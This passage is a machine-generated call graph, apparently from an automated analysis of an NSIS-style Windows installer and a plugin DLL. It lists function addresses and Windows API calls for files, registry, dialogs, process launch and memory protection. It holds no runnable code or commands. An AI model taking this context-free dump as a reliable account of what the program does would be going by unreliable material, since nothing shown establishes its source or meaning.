4062b6 4194->4205 4210 40632f wsprintfW 4194->4210 4211 4063e8 lstrcpynW 4194->4211 4195->4194 4203 406689 4196->4203 4197 4066ff 4198 406704 CharPrevW 4197->4198 4201 406725 4197->4201 4198->4197 4199 4066f2 CharNextW 4199->4197 4199->4203 4201->4137 4202 4066de CharNextW 4202->4203 4203->4197 4203->4199 4203->4202 4204 4066ed CharNextW 4203->4204 4217 405cea 4203->4217 4204->4199 4213 406255 4205->4213 4208 40631a 4208->4194 4209 4062ea RegQueryValueExW RegCloseKey 4209->4208 4210->4194 4211->4194 4212->4181 4214 406264 4213->4214 4215 406268 4214->4215 4216 40626d RegOpenKeyExW 4214->4216 4215->4208 4215->4209 4216->4215 4218 405cf0 4217->4218 4219 405d06 4218->4219 4220 405cf7 CharNextW 4218->4220 4219->4203 4220->4218 4270 4063e8 lstrcpynW 4221->4270 4223 405dd6 4271 405d68 CharNextW CharNextW 4223->4271 4225 405b1a 4225->4142 4225->4143 4227 40667c 5 API calls 4233 405dec 4227->4233 4228 405e1d lstrlenW 4229 405e28 4228->4229 4228->4233 4231 405cbd 3 API calls 4229->4231 4230 40672b 2 API calls 4230->4233 4232 405e2d GetFileAttributesW 4231->4232 4232->4225 4233->4225 4233->4228 4233->4230 4234 405d09 2 API calls 4233->4234 4234->4228 4235->4147 4237 405d17 4236->4237 4238 405d29 4237->4238 4239 405d1d CharPrevW 4237->4239 4238->4150 4239->4237 4239->4238 4240->4168 4277 405eb9 GetFileAttributesW 4241->4277 4244 405ad5 DeleteFileW 4246 405adb 4244->4246 4245 405acd RemoveDirectoryW 4245->4246 4247 405adf 4246->4247 4248 405aeb SetFileAttributesW 4246->4248 4247->4168 4248->4247 4250 40546b 4249->4250 4259 40550d 4249->4259 4251 405487 lstrlenW 4250->4251 4252 40640a 17 API calls 4250->4252 4253 4054b0 4251->4253 4254 405495 lstrlenW 4251->4254 4252->4251 4255 4054c3 4253->4255 4256 4054b6 SetWindowTextW 4253->4256 4257 4054a7 lstrcatW 4254->4257 4254->4259 4258 4054c9 SendMessageW SendMessageW SendMessageW 4255->4258 4255->4259 4256->4255 4257->4253 4258->4259 4259->4168 4261 4061cf 4260->4261 4262 4061c2 4260->4262 4261->4168 4280 406034 4262->4280 4265 406741 FindClose 4264->4265 4266 405c7e 4264->4266 4265->4266 4266->4144 4266->4157 4268 405c88 4267->4268 4269 405cd9 lstrcatW 4267->4269 4268->4162 4269->4268 4270->4223 4272 405d85 4271->4272 4274 405d97 4271->4274 4272->4274 4275 405d92 CharNextW 4272->4275 4273 405dbb 4273->4225 4273->4227 4274->4273 4276 405cea CharNextW 4274->4276 4275->4273 4276->4274 4278 405abe 4277->4278 4279 405ecb SetFileAttributesW 4277->4279 4278->4244 4278->4245 4278->4247 4279->4278 4281 406064 4280->4281 4282 40608a GetShortPathNameW 4280->4282 4307 405ede GetFileAttributesW CreateFileW 4281->4307 4284 4061a9 4282->4284 4285 40609f 4282->4285 4284->4261 4285->4284 4287 4060a7 wsprintfA 4285->4287 4286 40606e CloseHandle GetShortPathNameW 4286->4284 4288 406082 4286->4288 4289 40640a 17 API calls 4287->4289 4288->4282 4288->4284 4290 4060cf 4289->4290 4308 405ede GetFileAttributesW CreateFileW 4290->4308 4292 4060dc 4292->4284 4293 4060eb GetFileSize GlobalAlloc 4292->4293 4294 4061a2 CloseHandle 4293->4294 4295 40610d 4293->4295 4294->4284 4309 405f61 ReadFile 4295->4309 4300 406140 4302 405e43 4 API calls 4300->4302 4301 40612c lstrcpyA 4303 40614e 4301->4303 4302->4303 4304 406185 SetFilePointer 4303->4304 4316 405f90 WriteFile 4304->4316 4307->4286 4308->4292 4310 405f7f 4309->4310 4310->4294 4311 405e43 lstrlenA 4310->4311 4312 405e84 lstrlenA 4311->4312 4313 405e8c 4312->4313 4314 405e5d lstrcmpiA 4312->4314 4313->4300 4313->4301 4314->4313 4315 405e7b CharNextA 4314->4315 4315->4312 4317 405fae GlobalFree 4316->4317 4317->4294 4318 4015c1 4319 402c41 17 API calls 4318->4319 4320 4015c8 4319->4320 4321 405d68 4 API calls 4320->4321 4333 4015d1 4321->4333 4322 401631 4324 401663 4322->4324 4325 401636 4322->4325 4323 405cea CharNextW 4323->4333 4327 401423 24 API calls 4324->4327 4345 401423 4325->4345 4335 40165b 4327->4335 4332 40164a SetCurrentDirectoryW 4332->4335 4333->4322 4333->4323 4334 401617 GetFileAttributesW 4333->4334 4337 4059b9 4333->4337 4340 40591f CreateDirectoryW 4333->4340 4349 40599c CreateDirectoryW 4333->4349 4334->4333 4352 4067c2 GetModuleHandleA 4337->4352 4341 405970 GetLastError 4340->4341 4342 40596c 4340->4342 4341->4342 4343 40597f SetFileSecurityW 4341->4343 4342->4333 4343->4342 4344 405995 GetLastError 4343->4344 4344->4342 4346 405450 24 API calls 4345->4346 4347 401431 4346->4347 4348 4063e8 lstrcpynW 4347->4348 4348->4332 4350 4059b0 GetLastError 4349->4350 4351 4059ac 4349->4351 4350->4351 4351->4333 4353 4067e8 GetProcAddress 4352->4353 4354 4067de 4352->4354 4355 4059c0 4353->4355 4358 406752 GetSystemDirectoryW 4354->4358 4355->4333 4357 4067e4 4357->4353 4357->4355 4359 406774 wsprintfW LoadLibraryExW 4358->4359 4359->4357 4361 4053c4 4362 4053d4 4361->4362 4363 4053e8 4361->4363 4364 405431 4362->4364 4365 4053da 4362->4365 4366 4053f0 IsWindowVisible 4363->4366 4372 405410 4363->4372 4367 405436 CallWindowProcW 4364->4367 4375 4043ab 4365->4375 4366->4364 4369 4053fd 4366->4369 4370 4053e4 4367->4370 4378 404d1a SendMessageW 4369->4378 4372->4367 4383 404d9a 4372->4383 4376 4043c3 4375->4376 4377 4043b4 SendMessageW 4375->4377 4376->4370 4377->4376 4379 404d79 SendMessageW 4378->4379 4380 404d3d GetMessagePos ScreenToClient SendMessageW 4378->4380 4381 404d71 4379->4381 4380->4381 4382 404d76 4380->4382 4381->4372 4382->4379 4392 4063e8 lstrcpynW 4383->4392 4385 404dad 4393 40632f wsprintfW 4385->4393 4387 404db7 4394 40140b 4387->4394 4391 404dc7 4391->4364 4392->4385 4393->4387 4398 401389 4394->4398 4397 4063e8 lstrcpynW 4397->4391 4400 401390 4398->4400 4399 4013fe 4399->4397 4400->4399 4401 4013cb MulDiv SendMessageW 4400->4401 4401->4400 4846 401e49 4847 402c1f 17 API calls 4846->4847 4848 401e4f 4847->4848 4849 402c1f 17 API calls 4848->4849 4850 401e5b 4849->4850 4851 401e72 EnableWindow 4850->4851 4852 401e67 ShowWindow 4850->4852 4853 402ac5 4851->4853 4852->4853 4854 40264a 4855 402c1f 17 API calls 4854->4855 4856 402659 4855->4856 4857 4026a3 ReadFile 4856->4857 4858 405f61 ReadFile 4856->4858 4859 4026e3 MultiByteToWideChar 4856->4859 4860 402798 4856->4860 4863 40273c 4856->4863 4864 402709 SetFilePointer MultiByteToWideChar 4856->4864 4865 4027a9 4856->4865 4867 402796 4856->4867 4857->4856 4857->4867 4858->4856 4859->4856 4877 40632f wsprintfW 4860->4877 4863->4856 4863->4867 4868 405fbf SetFilePointer 4863->4868 4864->4856 4866 4027ca SetFilePointer 4865->4866 4865->4867 4866->4867 4869 405ff3 4868->4869 4870 405fdb 4868->4870 4869->4863 4871 405f61 ReadFile 4870->4871 4872 405fe7 4871->4872 4872->4869 4873 406024 SetFilePointer 4872->4873 4874 405ffc SetFilePointer 4872->4874 4873->4869 4874->4873 4875 406007 4874->4875 4876 405f90 WriteFile 4875->4876 4876->4869 4877->4867 4878 404dcc GetDlgItem GetDlgItem 4879 404e1e 7 API calls 4878->4879 4887 405037 4878->4887 4880 404ec1 DeleteObject 4879->4880 4881 404eb4 SendMessageW 4879->4881 4882 404eca 4880->4882 4881->4880 4883 404f01 4882->4883 4885 404ed9 4882->4885 4889 40435f 18 API calls 4883->4889 4884 40511b 4890 4051c7 4884->4890 4896 4053af 4884->4896 4901 405174 SendMessageW 4884->4901 4886 40640a 17 API calls 4885->4886 4891 404ee3 SendMessageW SendMessageW 4886->4891 4887->4884 4888 4050fc 4887->4888 4894 405097 4887->4894 4888->4884 4898 40510d SendMessageW 4888->4898 4895 404f15 4889->4895 4892 4051d1 SendMessageW 4890->4892 4893 4051d9 4890->4893 4891->4882 4892->4893 4903 4051f2 4893->4903 4904 4051eb ImageList_Destroy 4893->4904 4920 405202 4893->4920 4899 404d1a 5 API calls 4894->4899 4900 40435f 18 API calls 4895->4900 4897 4043c6 8 API calls 4896->4897 4902 4053bd 4897->4902 4898->4884 4925 4050a8 4899->4925 4905 404f23 4900->4905 4901->4896 4907 405189 SendMessageW 4901->4907 4908 4051fb GlobalFree 4903->4908 4903->4920 4904->4903 4909 404ff8 GetWindowLongW SetWindowLongW 4905->4909 4916 404ff2 4905->4916 4919 404f73 SendMessageW 4905->4919 4923 404fc0 SendMessageW 4905->4923 4924 404faf SendMessageW 4905->4924 4906 405371 4906->4896 4912 405383 ShowWindow GetDlgItem ShowWindow 4906->4912 4910 40519c 4907->4910 4908->4920 4911 405011 4909->4911 4915 4051ad SendMessageW 4910->4915 4913 405017 ShowWindow 4911->4913 4914 40502f 4911->4914 4912->4896 4934 404394 SendMessageW 4913->4934 4935 404394 SendMessageW 4914->4935 4915->4890 4916->4909 4916->4911 4919->4905 4920->4906 4921 404d9a 4 API calls 4920->4921 4927 40523d 4920->4927 4921->4927 4922 40502a 4922->4896 4923->4905 4924->4905 4925->4888 4926 405347 InvalidateRect 4926->4906 4928 40535d 4926->4928 4929 40526b SendMessageW 4927->4929 4931 405281 4927->4931 4936 404cd5 4928->4936 4929->4931 4930 4052e2 4933 4052f5 SendMessageW SendMessageW 4930->4933 4931->4926 4931->4930 4931->4933 4933->4931 4934->4922 4935->4887 4939 404c0c 4936->4939 4938 404cea 4938->4906 4940 404c25 4939->4940 4941 40640a 17 API calls 4940->4941 4942 404c89 4941->4942 4943 40640a 17 API calls 4942->4943 4944 404c94 4943->4944 4945 40640a 17 API calls 4944->4945 4946 404caa lstrlenW wsprintfW SetDlgItemTextW 4945->4946 4946->4938 5278 4016cc 5279 402c41 17 API calls 5278->5279 5280 4016d2 GetFullPathNameW 5279->5280 5281 4016ec 5280->5281 5287 40170e 5280->5287 5284 40672b 2 API calls 5281->5284 5281->5287 5282 401723 GetShortPathNameW 5283 402ac5 5282->5283 5285 4016fe 5284->5285 5285->5287 5288 4063e8 lstrcpynW 5285->5288 5287->5282 5287->5283 5288->5287 5289 40234e 5290 402c41 17 API calls 5289->5290 5291 40235d 5290->5291 5292 402c41 17 API calls 5291->5292 5293 402366 5292->5293 5294 402c41 17 API calls 5293->5294 5295 402370 GetPrivateProfileStringW 5294->5295 5296 4044cf lstrlenW 5297 4044f0 WideCharToMultiByte 5296->5297 5298 4044ee 5296->5298 5298->5297 5299 404850 5300 40487c 5299->5300 5301 40488d 5299->5301 5360 405a32 GetDlgItemTextW 5300->5360 5303 404899 GetDlgItem 5301->5303 5308 4048f8 5301->5308 5306 4048ad 5303->5306 5304 4049dc 5357 404b8b 5304->5357 5362 405a32 GetDlgItemTextW 5304->5362 5305 404887 5307 40667c 5 API calls 5305->5307 5310 4048c1 SetWindowTextW 5306->5310 5311 405d68 4 API calls 5306->5311 5307->5301 5308->5304 5312 40640a 17 API calls 5308->5312 5308->5357 5314 40435f 18 API calls 5310->5314 5316 4048b7 5311->5316 5317 40496c SHBrowseForFolderW 5312->5317 5313 404a0c 5318 405dc5 18 API calls 5313->5318 5319 4048dd 5314->5319 5315 4043c6 8 API calls 5320 404b9f 5315->5320 5316->5310 5324 405cbd 3 API calls 5316->5324 5317->5304 5321 404984 CoTaskMemFree 5317->5321 5322 404a12 5318->5322 5323 40435f 18 API calls 5319->5323 5325 405cbd 3 API calls 5321->5325 5363 4063e8 lstrcpynW 5322->5363 5326 4048eb 5323->5326 5324->5310 5327 404991 5325->5327 5361 404394 SendMessageW 5326->5361 5330 4049c8 SetDlgItemTextW 5327->5330 5335 40640a 17 API calls 5327->5335 5330->5304 5331 4048f1 5333 4067c2 5 API calls 5331->5333 5332 404a29 5334 4067c2 5 API calls 5332->5334 5333->5308 5341 404a30 5334->5341 5336 4049b0 lstrcmpiW 5335->5336 5336->5330 5339 4049c1 lstrcatW 5336->5339 5337 404a71 5364 4063e8 lstrcpynW 5337->5364 5339->5330 5340 404a78 5342 405d68 4 API calls 5340->5342 5341->5337 5345 405d09 2 API calls 5341->5345 5347 404ac9 5341->5347 5343 404a7e GetDiskFreeSpaceW 5342->5343 5346 404aa2 MulDiv 5343->5346 5343->5347 5345->5341 5346->5347 5348 404cd5 20 API calls 5347->5348 5358 404b3a 5347->5358 5351 404b27 5348->5351 5349 40140b 2 API calls 5350 404b5d 5349->5350 5365 404381 EnableWindow 5350->5365 5353 404b3c SetDlgItemTextW 5351->5353 5354 404b2c 5351->5354 5353->5358 5356 404c0c 20 API calls 5354->5356 5355 404b79 5355->5357 5366 4047a9 5355->5366 5356->5358 5357->5315 5358->5349 5358->5350 5360->5305 5361->5331 5362->5313 5363->5332 5364->5340 5365->5355 5367 4047b7 5366->5367 5368 4047bc SendMessageW 5366->5368 5367->5368 5368->5357 5369 401b53 5370 402c41 17 API calls 5369->5370 5371 401b5a 5370->5371 5372 402c1f 17 API calls 5371->5372 5373 401b63 wsprintfW 5372->5373 5374 402ac5 5373->5374 5375 401956 5376 402c41 17 API calls 5375->5376 5377 40195d lstrlenW 5376->5377 5378 402592 5377->5378 5379 6eab103d 5382 6eab101b 5379->5382 5389 6eab1516 5382->5389 5384 6eab1020 5385 6eab1027 GlobalAlloc 5384->5385 5386 6eab1024 5384->5386 5385->5386 5387 6eab153d 3 API calls 5386->5387 5388 6eab103b 5387->5388 5390 6eab151c 5389->5390 5391 6eab1522 5390->5391 5392 6eab152e GlobalFree 5390->5392 5391->5384 5392->5384 5400 4014d7 5401 402c1f 17 API calls 5400->5401 5402 4014dd Sleep 5401->5402 5404 402ac5 5402->5404 5405 401f58 5406 402c41 17 API calls 5405->5406 5407 401f5f 5406->5407 5408 40672b 2 API calls 5407->5408 5409 401f65 5408->5409 5410 401f76 5409->5410 5412 40632f wsprintfW 5409->5412 5412->5410 5413 402259 5414 402c41 17 API calls 5413->5414 5415 40225f 5414->5415 5416 402c41 17 API calls 5415->5416 5417 402268 5416->5417 5418 402c41 17 API calls 5417->5418 5419 402271 5418->5419 5420 40672b 2 API calls 5419->5420 5421 40227a 5420->5421 5422 40228b lstrlenW lstrlenW 5421->5422 5423 40227e 5421->5423 5425 405450 24 API calls 5422->5425 5424 405450 24 API calls 5423->5424 5426 402286 5424->5426 5427 4022c9 SHFileOperationW 5425->5427 5427->5423 5427->5426 5269 40175c 5270 402c41 17 API calls 5269->5270 5271 401763 5270->5271 5272 405f0d 2 API calls 5271->5272 5273 40176a 5272->5273 5274 405f0d 2 API calls 5273->5274 5274->5273 5428 401d5d GetDlgItem GetClientRect 5429 402c41 17 API calls 5428->5429 5430 401d8f LoadImageW SendMessageW 5429->5430 5431 402ac5 5430->5431 5432 401dad DeleteObject 5430->5432 5432->5431 5433 4022dd 5434 4022e4 5433->5434 5437 4022f7 5433->5437 5435 40640a 17 API calls 5434->5435 5436 4022f1 5435->5436 5438 405a4e MessageBoxIndirectW 5436->5438 5438->5437 5439 401563 5440 402a6b 5439->5440 5443 40632f wsprintfW 5440->5443 5442 402a70 5443->5442 4402 4023e4 4403 402c41 17 API calls 4402->4403 4404 4023f6 4403->4404 4405 402c41 17 API calls 4404->4405 4406 402400 4405->4406 4419 402cd1 4406->4419 4409 402438 4415 402444 4409->4415 4423 402c1f 4409->4423 4410 40288b 4411 402c41 17 API calls 4412 40242e lstrlenW 4411->4412 4412->4409 4414 402463 RegSetValueExW 4417 402479 RegCloseKey 4414->4417 4415->4414 4426 4031d6 4415->4426 4417->4410 4420 402cec 4419->4420 4441 406283 4420->4441 4424 40640a 17 API calls 4423->4424 4425 402c34 4424->4425 4425->4415 4427 403201 4426->4427 4428 4031e5 SetFilePointer 4426->4428 4445 4032de GetTickCount 4427->4445 4428->4427 4431 405f61 ReadFile 4432 403221 4431->4432 4433 4032de 42 API calls 4432->4433 4435 40329e 4432->4435 4434 403238 4433->4434 4434->4435 4436 4032a4 ReadFile 4434->4436 4438 403247 4434->4438 4435->4414 4436->4435 4438->4435 4439 405f61 ReadFile 4438->4439 4440 405f90 WriteFile 4438->4440 4439->4438 4440->4438 4442 406292 4441->4442 4443 402410 4442->4443 4444 40629d RegCreateKeyExW 4442->4444 4443->4409 4443->4410 4443->4411 4444->4443 4446 403436 4445->4446 4447 40330c 4445->4447 4448 402e8e 32 API calls 4446->4448 4458 40345d SetFilePointer 4447->4458 4454 403208 4448->4454 4450 403317 SetFilePointer 4456 40333c 4450->4456 4454->4431 4454->4435 4455 405f90 WriteFile 4455->4456 4456->4454 4456->4455 4457 403417 SetFilePointer 4456->4457 4459 403447 4456->4459 4462 406943 4456->4462 4469 402e8e 4456->4469 4457->4446 4458->4450 4460 405f61 ReadFile 4459->4460 4461 40345a 4460->4461 4461->4456 4463 406968 4462->4463 4464 406970 4462->4464 4463->4456 4464->4463 4465 406a00 GlobalAlloc 4464->4465 4466 4069f7 GlobalFree 4464->4466 4467 406a77 GlobalAlloc 4464->4467 4468 406a6e GlobalFree 4464->4468 4465->4463 4465->4464 4466->4465 4467->4463 4467->4464 4468->4467 4470 402eb7 4469->4470 4471 402e9f 4469->4471 4474 402ec7 GetTickCount 4470->4474 4475 402ebf 4470->4475 4472 402ea8 DestroyWindow 4471->4472 4473 402eaf 4471->4473 4472->4473 4473->4456 4474->4473 4477 402ed5 4474->4477 4484 4067fe 4475->4484 4478 402f0a CreateDialogParamW ShowWindow 4477->4478 4479 402edd 4477->4479 4478->4473 4479->4473 4488 402e72 4479->4488 4481 402eeb wsprintfW 4482 405450 24 API calls 4481->4482 4483 402f08 4482->4483 4483->4473 4485 40681b PeekMessageW 4484->4485 4486 406811 DispatchMessageW 4485->4486 4487 40682b 4485->4487 4486->4485 4487->4473 4489 402e81 4488->4489 4490 402e83 MulDiv 4488->4490 4489->4490 4490->4481 5444 4071e5 5445 406976 5444->5445 5445->5445 5446 406a00 GlobalAlloc 5445->5446 5447 4069f7 GlobalFree 5445->5447 5448 406a77 GlobalAlloc 5445->5448 5449 406a6e GlobalFree 5445->5449 5450 4072e1 5445->5450 5446->5445 5446->5450 5447->5446 5448->5445 5448->5450 5449->5448 5451 402868 5452 402c41 17 API calls 5451->5452 5453 40286f FindFirstFileW 5452->5453 5454 402882 5453->5454 5455 402897 5453->5455 5459 40632f wsprintfW 5455->5459 5457 4028a0 5460 4063e8 lstrcpynW 5457->5460 5459->5457 5460->5454 5461 401968 5462 402c1f 17 API calls 5461->5462 5463 40196f 5462->5463 5464 402c1f 17 API calls 5463->5464 5465 40197c 5464->5465 5466 402c41 17 API calls 5465->5466 5467 401993 lstrlenW 5466->5467 5469 4019a4 5467->5469 5468 4019e5 5469->5468 5473 4063e8 lstrcpynW 5469->5473 5471 4019d5 5471->5468 5472 4019da lstrlenW 5471->5472 5472->5468 5473->5471 5474 40166a 5475 402c41 17 API calls 5474->5475 5476 401670 5475->5476 5477 40672b 2 API calls 5476->5477 5478 401676 5477->5478 5479 6eab1000 5480 6eab101b 5 API calls 5479->5480 5481 6eab1019 5480->5481 4976 40176f 4977 402c41 17 API calls 4976->4977 4978 401776 4977->4978 4979 401796 4978->4979 4980 40179e 4978->4980 5016 4063e8 lstrcpynW 4979->5016 5017 4063e8 lstrcpynW 4980->5017 4983 40179c 4987 40667c 5 API calls 4983->4987 4984 4017a9 4985 405cbd 3 API calls 4984->4985 4986 4017af lstrcatW 4985->4986 4986->4983 5000 4017bb 4987->5000 4988 40672b 2 API calls 4988->5000 4989 4017f7 4990 405eb9 2 API calls 4989->4990 4990->5000 4992 4017cd CompareFileTime 4992->5000 4993 40188d 4994 405450 24 API calls 4993->4994 4995 401897 4994->4995 4998 4031d6 44 API calls 4995->4998 4996 405450 24 API calls 5005 401879 4996->5005 4997 4063e8 lstrcpynW 4997->5000 4999 4018aa 4998->4999 5001 4018be SetFileTime 4999->5001 5003 4018d0 CloseHandle 4999->5003 5000->4988 5000->4989 5000->4992 5000->4993 5000->4997 5002 40640a 17 API calls 5000->5002 5010 405a4e MessageBoxIndirectW 5000->5010 5014 401864 5000->5014 5015 405ede GetFileAttributesW CreateFileW 5000->5015 5001->5003 5002->5000 5004 4018e1 5003->5004 5003->5005 5006 4018e6 5004->5006 5007 4018f9 5004->5007 5008 40640a 17 API calls 5006->5008 5009 40640a 17 API calls 5007->5009 5011 4018ee lstrcatW 5008->5011 5012 401901 5009->5012 5010->5000 5011->5012 5013 405a4e MessageBoxIndirectW 5012->5013 5013->5005 5014->4996 5014->5005 5015->5000 5016->4983 5017->4984 5018 4027ef 5019 4027f6 5018->5019 5025 402a70 5018->5025 5020 402c1f 17 API calls 5019->5020 5021 4027fd 5020->5021 5022 40280c SetFilePointer 5021->5022 5023 40281c 5022->5023 5022->5025 5026 40632f wsprintfW 5023->5026 5026->5025 5482 401a72 5483 402c1f 17 API calls 5482->5483 5484 401a7b 5483->5484 5485 402c1f 17 API calls 5484->5485 5486 401a20 5485->5486 5487 406af2 5488 406976 5487->5488 5489 4072e1 5488->5489 5490 406a00 GlobalAlloc 5488->5490 5491 4069f7 GlobalFree 5488->5491 5492 406a77 GlobalAlloc 5488->5492 5493 406a6e GlobalFree 5488->5493 5490->5488 5490->5489 5491->5490 5492->5488 5492->5489 5493->5492 5494 401573 5495 401583 ShowWindow 5494->5495 5496 40158c 5494->5496 5495->5496 5497 402ac5 5496->5497 5498 40159a ShowWindow 5496->5498 5498->5497 5499 401cf3 5500 402c1f 17 API calls 5499->5500 5501 401cf9 IsWindow 5500->5501 5502 401a20 5501->5502 5503 402df3 5504 402e05 SetTimer 5503->5504 5505 402e1e 5503->5505 5504->5505 5506 402e6c 5505->5506 5507 402e72 MulDiv 5505->5507 5508 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5507->5508 5508->5506 5510 4014f5 SetForegroundWindow 5511 402ac5 5510->5511 5512 402576 5513 402c41 17 API calls 5512->5513 5514 40257d 5513->5514 5517 405ede GetFileAttributesW CreateFileW 5514->5517 5516 402589 5517->5516 5218 401b77 5219 401bc8 5218->5219 5222 401b84 5218->5222 5220 401bf2 GlobalAlloc 5219->5220 5224 401bcd 5219->5224 5225 40640a 17 API calls 5220->5225 5221 401c0d 5223 40640a 17 API calls 5221->5223 5231 4022f7 5221->5231 5222->5221 5228 401b9b 5222->5228 5226 4022f1 5223->5226 5224->5231 5239 4063e8 lstrcpynW 5224->5239 5225->5221 5232 405a4e MessageBoxIndirectW 5226->5232 5237 4063e8 lstrcpynW 5228->5237 5229 401bdf GlobalFree 5229->5231 5232->5231 5233 401baa 5238 4063e8 lstrcpynW 5233->5238 5235 401bb9 5240 4063e8 lstrcpynW 5235->5240 5237->5233 5238->5235 5239->5229 5240->5231 5241 6eab2993 5242 6eab29e3 5241->5242 5243 6eab29a3 VirtualProtect 5241->5243 5243->5242 5244 4024f8 5245 402c81 17 API calls 5244->5245 5246 402502 5245->5246 5247 402c1f 17 API calls 5246->5247 5248 40250b 5247->5248 5249 402533 RegEnumValueW 5248->5249 5250 402527 RegEnumKeyW 5248->5250 5253 40288b 5248->5253 5251 402548 5249->5251 5252 40254f RegCloseKey 5249->5252 5250->5252 5251->5252 5252->5253 5255 40167b 5256 402c41 17 API calls 5255->5256 5257 401682 5256->5257 5258 402c41 17 API calls 5257->5258 5259 40168b 5258->5259 5260 402c41 17 API calls 5259->5260 5261 401694 MoveFileW 5260->5261 5262 4016a0 5261->5262 5263 4016a7 5261->5263 5264 401423 24 API calls 5262->5264 5265 40672b 2 API calls 5263->5265 5267 402250 5263->5267 5264->5267 5266 4016b6 5265->5266 5266->5267 5268 4061ae 36 API calls 5266->5268 5268->5262 5525 401e7d 5526 402c41 17 API calls 5525->5526 5527 401e83 5526->5527 5528 402c41 17 API calls 5527->5528 5529 401e8c 5528->5529 5530 402c41 17 API calls 5529->5530 5531 401e95 5530->5531 5532 402c41 17 API calls 5531->5532 5533 401e9e 5532->5533 5534 401423 24 API calls 5533->5534 5535 401ea5 5534->5535 5542 405a14 ShellExecuteExW 5535->5542 5537 401ee7 5540 40288b 5537->5540 5543 406873 WaitForSingleObject 5537->5543 5539 401f01 CloseHandle 5539->5540 5542->5537 5544 40688d 5543->5544 5545 40689f GetExitCodeProcess 5544->5545 5546 4067fe 2 API calls 5544->5546 5545->5539 5547 406894 WaitForSingleObject 5546->5547 5547->5544 5548 4019ff 5549 402c41 17 API calls 5548->5549 5550 401a06 5549->5550 5551 402c41 17 API calls 5550->5551 5552 401a0f 5551->5552 5553 401a16 lstrcmpiW 5552->5553 5554 401a28 lstrcmpW 5552->5554 5555 401a1c 5553->5555 5554->5555 5556 401000 5557 401037 BeginPaint GetClientRect 5556->5557 5558 40100c DefWindowProcW 5556->5558 5560 4010f3 5557->5560 5561 401179 5558->5561 5562 401073 CreateBrushIndirect FillRect DeleteObject 5560->5562 5563 4010fc 5560->5563 5562->5560 5564 401102 CreateFontIndirectW 5563->5564 5565 401167 EndPaint 5563->5565 5564->5565 5566 401112 6 API calls 5564->5566 5565->5561 5566->5565 5567 401503 5568 40150b 5567->5568 5570 40151e 5567->5570 5569 402c1f 17 API calls 5568->5569 5569->5570 4491 402484 4502 402c81 4491->4502 4494 402c41 17 API calls 4495 402497 4494->4495 4496 4024a2 RegQueryValueExW 4495->4496 4499 40288b 4495->4499 4497 4024c8 RegCloseKey 4496->4497 4498 4024c2 4496->4498 4497->4499 4498->4497 4507 40632f wsprintfW 4498->4507 4503 402c41 17 API calls 4502->4503 4504 402c98 4503->4504 4505 406255 RegOpenKeyExW 4504->4505 4506 40248e 4505->4506 4506->4494 4507->4497 5571 402104 5572 402c41 17 API calls 5571->5572 5573 40210b 5572->5573 5574 402c41 17 API calls 5573->5574 5575 402115 5574->5575 5576 402c41 17 API calls 5575->5576 5577 40211f 5576->5577 5578 402c41 17 API calls 5577->5578 5579 402129 5578->5579 5580 402c41 17 API calls 5579->5580 5582 402133 5580->5582 5581 402172 CoCreateInstance 5586 402191 5581->5586 5582->5581 5583 402c41 17 API calls 5582->5583 5583->5581 5584 401423 24 API calls 5585 402250 5584->5585 5586->5584 5586->5585 4751 403e86 4752 403fd9 4751->4752 4753 403e9e 4751->4753 4755 40402a 4752->4755 4756 403fea GetDlgItem GetDlgItem 4752->4756 4753->4752 4754 403eaa 4753->4754 4758 403eb5 SetWindowPos 4754->4758 4759 403ec8 4754->4759 4757 404084 4755->4757 4768 401389 2 API calls 4755->4768 4760 40435f 18 API calls 4756->4760 4762 4043ab SendMessageW 4757->4762 4785 403fd4 4757->4785 4758->4759 4763 403ee5 4759->4763 4764 403ecd ShowWindow 4759->4764 4761 404014 SetClassLongW 4760->4761 4765 40140b 2 API calls 4761->4765 4779 404096 4762->4779 4766 403f07 4763->4766 4767 403eed DestroyWindow 4763->4767 4764->4763 4765->4755 4770 403f0c SetWindowLongW 4766->4770 4771 403f1d 4766->4771 4769 404309 4767->4769 4772 40405c 4768->4772 4778 404319 ShowWindow 4769->4778 4769->4785 4770->4785 4774 403fc6 4771->4774 4775 403f29 GetDlgItem 4771->4775 4772->4757 4776 404060 SendMessageW 4772->4776 4773 4042ea DestroyWindow EndDialog 4773->4769 4832 4043c6 4774->4832 4780 403f59 4775->4780 4781 403f3c SendMessageW IsWindowEnabled 4775->4781 4776->4785 4777 40140b 2 API calls 4777->4779 4778->4785 4779->4773 4779->4777 4783 40640a 17 API calls 4779->4783 4779->4785 4793 40435f 18 API calls 4779->4793 4813 40422a DestroyWindow 4779->4813 4823 40435f 4779->4823 4784 403f5e 4780->4784 4786 403f66 4780->4786 4788 403fad SendMessageW 4780->4788 4789 403f79 4780->4789 4781->4780 4781->4785 4783->4779 4829 404338 4784->4829 4786->4784 4786->4788 4788->4774 4791 403f81 4789->4791 4792 403f96 4789->4792 4790 403f94 4790->4774 4795 40140b 2 API calls 4791->4795 4794 40140b 2 API calls 4792->4794 4793->4779 4796 403f9d 4794->4796 4795->4784 4796->4774 4796->4784 4798 404111 GetDlgItem 4799 404126 4798->4799 4800 40412e ShowWindow KiUserCallbackDispatcher 4798->4800 4799->4800 4826 404381 EnableWindow 4800->4826 4802 404158 EnableWindow 4807 40416c 4802->4807 4803 404171 GetSystemMenu EnableMenuItem SendMessageW 4804 4041a1 SendMessageW 4803->4804 4803->4807 4804->4807 4806 403e67 18 API calls 4806->4807 4807->4803 4807->4806 4827 404394 SendMessageW 4807->4827 4828 4063e8 lstrcpynW 4807->4828 4809 4041d0 lstrlenW 4810 40640a 17 API calls 4809->4810 4811 4041e6 SetWindowTextW 4810->4811 4812 401389 2 API calls 4811->4812 4812->4779 4813->4769 4814 404244 CreateDialogParamW 4813->4814 4814->4769 4815 404277 4814->4815 4816 40435f 18 API calls 4815->4816 4817 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4816->4817 4818 401389 2 API calls 4817->4818 4819 4042c8 4818->4819 4819->4785 4820 4042d0 ShowWindow 4819->4820 4821 4043ab SendMessageW 4820->4821 4822 4042e8 4821->4822 4822->4769 4824 40640a 17 API calls 4823->4824 4825 40436a SetDlgItemTextW 4824->4825 4825->4798 4826->4802 4827->4807 4828->4809 4830 404345 SendMessageW 4829->4830 4831 40433f 4829->4831 4830->4790 4831->4830 4833 404489 4832->4833 4834 4043de GetWindowLongW 4832->4834 4833->4785 4834->4833 4835 4043f3 4834->4835 4835->4833 4836 404420 GetSysColor 4835->4836 4837 404423 4835->4837 4836->4837 4838 404433 SetBkMode 4837->4838 4839 404429 SetTextColor 